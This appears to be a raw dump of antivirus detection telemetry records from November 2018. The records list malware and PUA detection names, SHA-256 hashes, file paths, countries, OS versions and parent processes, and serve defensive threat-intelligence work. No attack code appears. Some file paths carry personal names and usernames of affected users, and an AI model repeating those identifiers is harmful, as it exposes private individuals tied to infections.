  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:07:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='marketing de réseau.exe', filepath='G:\\Marketing de réseau.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline='\\\\\\/M', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\zabkat\\xplorer2_lite\\xplorer2_lite.exe', parentsize=928496, timestamp='2018-11-04T13:01:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avjebmi.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\avjebmi.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0a11464c7e25c439e48278628a11ddcb6252c622e70ffa1ec4ba74e198e4c5c0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:59:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094854-8a778315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e94398e3\\AVSCAN-20181104-094646-7AE93737\\AVSCAN-20181104-094854-8A778315', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150353-d48184e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49ec2308\\AVSCAN-20181104-150230-CADCD3DE\\AVSCAN-20181104-150353-D48184E6', filesize=2496000, name='TR/Black.Gen2.#M1.#R1'), hash='7f636e55dcc3235527fefa9d1704df8947bf01e956b352ed59a0f80a0e8c0f23', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:04:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a1998', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a1998', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:07:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120125-1430106e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a890420\\AVSCAN-20181104-120111-113E7561\\AVSCAN-20181104-120125-1430106E', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:01:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:39:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T21:48:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='image aloe vera.exe', filepath='G:\\Image Aloe vera.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='store-v2.exe', filepath='D:\\.Spotlight-V100\\Store-V2.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00062163', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00062163', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221845-aa902139', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221845-AA902139', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:18:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ocs_v71b.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline='\\\\\\/Auto', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8114960, timestamp='2018-11-04T19:18:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fhhuwtau.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\fHhUWtau.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='postmig.exe', filepath='\\\\ts-xelcea\\share\\tasferimento\\windowseasytransfer\\x86\\PostMig.exe', filesize=640000, name='W32/Stanit.#M1.#R1'), hash='c7cd3eab885a5d4701bb5e346d1e27883593b7930c4e33e1959b3d36d9f415d4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134605-63bb324c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae42c134\\AVSCAN-20181102-134550-6062014D\\AVSCAN-20181102-134605-63BB324C', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:46:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203953-43311680', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e680c6b\\AVSCAN-20181102-203934-4077FE32\\AVSCAN-20181102-203953-43311680', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:39:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='production fida.exe', filepath='E:\\fidassur\\LOUBNA\\production fida.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='8cc20abc68cca849c2b6e25df05048158dcffce1684e06ada6ec9c0f1357cf8d', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='temari.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Temari\\Temari.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='eb77698dd298dafa75c4160c264ae2a2f5eb613941a4f88af2f524c51b74dab1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a3e30739498b6306acbb002dd37a2d76440694c3644eb90bea4f2338120d848e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-28\\A3E30739498B6306ACBB002DD37A2D76440694C3644EB90BEA4F2338120D848E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a3e30739498b6306acbb002dd37a2d76440694c3644eb90bea4f2338120d848e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d6654e9beb6f6f15cc9fca358375e60af60eedce20c9e82578ffe4da23a27c1b', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-24\\D6654E9BEB6F6F15CC9FCA358375E60AF60EEDCE20C9E82578FFE4DA23A27C1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d6654e9beb6f6f15cc9fca358375e60af60eedce20c9e82578ffe4da23a27c1b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:40:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101232-8b9da606', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-101232-8B9DA606', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ba149b9e750ed64fbe25b70f60e84f25e6e7466e40f23fc9b1575e910e0d162c.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\BA149B9E750ED64FBE25B70F60E84F25E6E7466E40F23FC9B1575E910E0D162C.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ba149b9e750ed64fbe25b70f60e84f25e6e7466e40f23fc9b1575e910e0d162c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:54:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101920-99537017', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101904-971CB8F7\\AVSCAN-20181102-101920-99537017', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gcedgf.exe', filepath='c:\\users\\X\\appdata\\roaming\\gcedgf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartio_gate.exe', filepath='D:\\ftp\\请销假\\东南学生公寓程序\\SmartIO_DYEZ2\\SmartIO_DYEZ\\smartio_gate\\smartio_gate.exe', filesize=4672000, name='W32/Induc.blr.#M1.#R1'), hash='e61847f6a943cc712fe0688dcb7531f6cce5e855b788468d9e61680dc74a8653', metadata=Row(cmdline='--engine=2 --session-id=Tu61fHMGr6jvTZwgKQ3S4oNKB6\\\\\\/1Yhr8be9FoB71 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T01:02:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsqFF0D.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:16:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avast_free_antivirus_setup_offline.exe', filepath='D:\\anti\\avast_free_antivirus_setup_offline.exe', filesize=258944000, name='TR/Patched.Gen.#M300.#R3374'), hash='d3ed1cafc03523a2489e150230df7a70bb56884b276d2c04ae06f33157bbf8b6', metadata=Row(cmdline='rts', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1936464, timestamp='2018-11-02T04:35:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T23:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unregmp2.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-mediaplayer-setup_31bf3856ad364e35_6.1.7601.17514_none_affb336d34ccf2f8\\unregmp2.exe', filesize=1408000, name='W32/Virut.Gen.#M1.#R1'), hash='8fc3a9bb18df88977f2d067d34540d225606d43b32f495be5dfe1f635c2fc3f2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:03:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='genfori.exe', filepath='\\\\ts-xelcea\\share\\vecchio pc dino\\hd vecchio pc\\CDSWIN\\genfori.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='d71c0ede81eaeafea2b53bbfe013a0e3c6ede27d4744e1fc3e94400ec17c77f3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\WINDOWS\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T12:25:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='c:\\applic~1\\service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline='2644', country='GT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Applications\\Service.exe', parentsize=14208000, timestamp='2018-11-02T17:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsp7482.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official (1).exe', parentsize=268416568, timestamp='2018-11-02T17:30:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mpstd.exe', filepath='\\\\192.168.0.5\\desha_itd\\2.) OTHER THINGS\\IERP MANILA\\Drivers\\Audio\\REALTEK\\XP64_MCE_XP_2K_ME_98(A380)\\Ap\\Mpstd.exe', filesize=3904000, name='W32/Viking.AT.#M1.#R1'), hash='ba4887fb618f9175010e02cd0759ded976db393f5f6ef7e84c11476dd9b80603', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2373784, timestamp='2018-11-02T13:54:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msinfo32.exe', filepath='D:\\Local Disk\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='a8c8e2fb301e60322836fd5b996689853329163afc4bc93264fc194bd58497f4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bc12d22f55401f1fc56c3f6b6236c336cc7c915ec35c69c79cbe41ed5a557c0e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T08:29:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newd162.tmp', filepath='\\\\?\\C:\\TMP\\NewD162.tmp', filesize=73744000, name='TR/Dropper.Gen.#M300.#R359'), hash='9054f39f7996268d48ac1bf8d439c0c78a834e463c922096a7e019d8be393949', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:50:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline='-osint -url \\\\\\"http:\\\\\\/\\\\\\/www.meditel.ma\\\\\\/\\\\\\"', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T10:21:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~se4635.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~se4635.tmp', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='admin.exe', filepath='E:\\PENTA 14-09-2016\\admin.exe', filesize=6720000, name='W32/Almanahe.D.#M1.#R1'), hash='9f9c4216b3ab8471f0ffbdcd2556b8730d613cb1675bfa3271a287600294555f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:31:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-215736-81cdc16c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215736-81CDC16C', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:57:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002967e8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002967e8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:27:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291133', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291133', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:46:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T00:37:28Z'), dt=datetime.date(2018, 11, 4)),
